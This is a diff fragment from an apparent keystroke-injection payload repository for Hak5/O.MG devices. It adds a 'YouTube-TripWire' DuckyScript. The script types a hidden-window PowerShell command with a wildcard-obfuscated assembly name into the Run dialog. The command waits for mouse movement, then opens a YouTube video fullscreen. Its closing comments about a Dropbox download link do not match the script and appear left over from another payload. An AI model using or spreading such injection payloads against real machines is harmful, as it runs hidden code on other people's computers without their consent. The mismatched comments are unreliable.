+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+
+
diff --git a/Payloads/YT-Tripwire/YouTube-TripWire.txt b/Payloads/YT-Tripwire/YouTube-TripWire.txt
new file mode 100644
index 0000000..f7d6fd1
--- /dev/null
+++ b/Payloads/YT-Tripwire/YouTube-TripWire.txt
@@ -0,0 +1,10 @@
+REM Title: YouTube-TripWire
+REM Author: I am Jakoby
+REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)
+REM Target: Windows 10, 11
+GUI r
+DELAY 500
+STRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
+ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+
+ 
+
+ 
+
+ 
+
+ 
+
+